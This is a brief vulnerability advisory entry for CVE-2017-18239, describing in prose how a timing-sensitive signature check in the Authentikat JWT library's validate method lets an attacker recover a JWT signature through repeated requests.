Time-Sensitive Vulnerability in Authentikat JWT Library by Jason Goodwin
CVE-2017-18239
9.8CRITICAL
What is CVE-2017-18239?
A vulnerability exists in the Authentikat JWT Library, where the JsonWebToken.validate method performs a time-sensitive equality check on the JWT signature. This flaw enables attackers to exploit the validation process, allowing them to guess the signature bit by bit by making repeated validation requests. If the attacker can control the input, they may leverage this vulnerability to gain unauthorized access or manipulate signed content.